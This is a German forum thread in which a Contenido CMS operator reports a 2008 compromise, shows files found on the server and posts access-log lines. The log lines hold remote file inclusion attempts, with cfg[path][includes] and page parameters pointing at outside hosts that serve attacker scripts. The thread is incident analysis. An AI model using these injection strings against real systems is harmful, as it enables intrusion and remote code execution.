Version 4.8.6. gehackt?

mko · Beitrag von **mko** » Do 11. Dez 2008, 07:56

Heute früh haben wir bemerkt, dass unsere Contenido 4.8.6 Installationen zerschossen wurden und folgenden Code gefunden:

Code: Alles auswählen

// ** I18N Afrikaans Calendar._DN = new Array ("Sondag", "Maandag", "Dinsdag", "Woensdag", "Donderdag", "Vrydag", "Saterdag", "Sondag"); Calendar._MN = new Array ("Januarie", "Februarie", "Maart", "April", "Mei", "Junie", "Julie", "Augustus", "September", "Oktober", "November", "Desember"); // tooltips Calendar._TT = {}; Calendar._TT["TOGGLE"] = "Verander eerste dag van die week"; Calendar._TT["PREV_YEAR"] = "Vorige jaar (hou vir keuselys)"; Calendar._TT["PREV_MONTH"] = "Vorige maand (hou vir keuselys)"; Calendar._TT["GO_TODAY"] = "Gaan na vandag"; Calendar._TT["NEXT_MONTH"] = "Volgende maand (hou vir keuselys)"; Calendar._TT["NEXT_YEAR"] = "Volgende jaar (hou vir keuselys)"; Calendar._TT["SEL_DATE"] = "Kies datum"; Calendar._TT["DRAG_TO_MOVE"] = "Sleep om te skuif"; Calendar._TT["PART_TODAY"] = " (vandag)"; Calendar._TT["MON_FIRST"] = "Vertoon Maandag eerste"; Calendar._TT["SUN_FIRST"] = "Display Sunday first"; Calendar._TT["CLOSE"] = "Close"; Calendar._TT["TODAY"] = "Today";

Weiters habe ich unter contenido/plugins/content_allocation eine Datei classes gefunden:

Code: Alles auswählen

tinyMCE.addI18n('vi.simple',{
bold_desc:"\u0110\u1EADm (Ctrl+B)",
italic_desc:"Nghi\u00EAng (Ctrl+I)",
underline_desc:"G\u1EA1ch ch\u00E2n (Ctrl+U)",
striketrough_desc:"G\u1EA1ch x\u00F3a",
bullist_desc:"Danh s\u00E1ch",
numlist_desc:"Danh s\u00E1ch th\u1EE9 t\u1EF1",
undo_desc:"Kh\u00F4i ph\u1EE5c (Ctrl+Z)",
redo_desc:"L\u1EB7p l\u1EA1i (Ctrl+Y)",
cleanup_desc:"D\u1ECDn d\u1EB9p m\u00E3 l\u1ED9n x\u1ED9n"
});

in plugins/repository wurde das Verzeichnis custom durch eine Datei ersetzt und in classes/contenido/ die Datei class.user.php

Hat wer eine Idee, wie das geklappt hat?

Edit: Habe mich mit der Version vertan - bitte verschieben...

Beitrag von **Oldperl** » Do 11. Dez 2008, 08:44

Hallo mko,

das könnte man nur rausfinden indem man die Server Logs durchschaut. Mit den von dir gemachten Angaben kann man dazu nichts sagen, auser man hätte das selbe Problem gehabt.

Gruß aus Franken

Ortwin

mko · Beitrag von **mko** » Do 11. Dez 2008, 08:47

Im Contenido Log steht nichts - das Server-Log schau ich mir gerade an. Habe nun wieder einen sauberen Zustand hergestellt.

Tippe auf jscalendar - G´schichte

Server-Logs
front_content.php?idcatart=http://halloween.fizwig.com/index.htm? HTTP/1.1" 302 2701

//external/frontend/news.php?cfg[path][includes]=http://h1.ripway.com/Insiderz85/iddu.txt??%20?? HTTP/1.1" 404 310

/front_content.php?idcat=http://hoffsons.narod.ru/index.htm? HTTP/1.1" 302 2701

/front_content.php?idcat=http://babycaleb.fortunecity.co.uk/index.htm? HTTP/1.1" 302 2701

"GET /front_content.php//external/frontend/news.php?cfg[path][includes]=http://h1.ripway.com/Insiderz85/iddu.txt??%20?? HTTP/1.1" 200 5

"GET //external/frontend/news.php?cfg[path][includes]=http://h1.ripway.com/Insiderz85/iddu.txt??%20?? HTTP/1.1" 404 308

"GET //external/frontend/news.php?cfg[path][includes]=http://thebuckhornbar.com/webcalendar/i ... /crutz.txt??? HTTP/1.1" 404 308

"GET /front_content.php//external/frontend/news.php?cfg[path][includes]=http://thebuckhornbar.com/webcalendar/i ... /crutz.txt??? HTTP/1.1" 200 5

/front_content.php/content.php?page=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 200 8762

"GET /front_content.php?idcat=http://www33.websamba.com/mysons/index.htm? HTTP/1.1" 404 298

"GET / HTTP/1.0" 200 95 = letzter Eintrag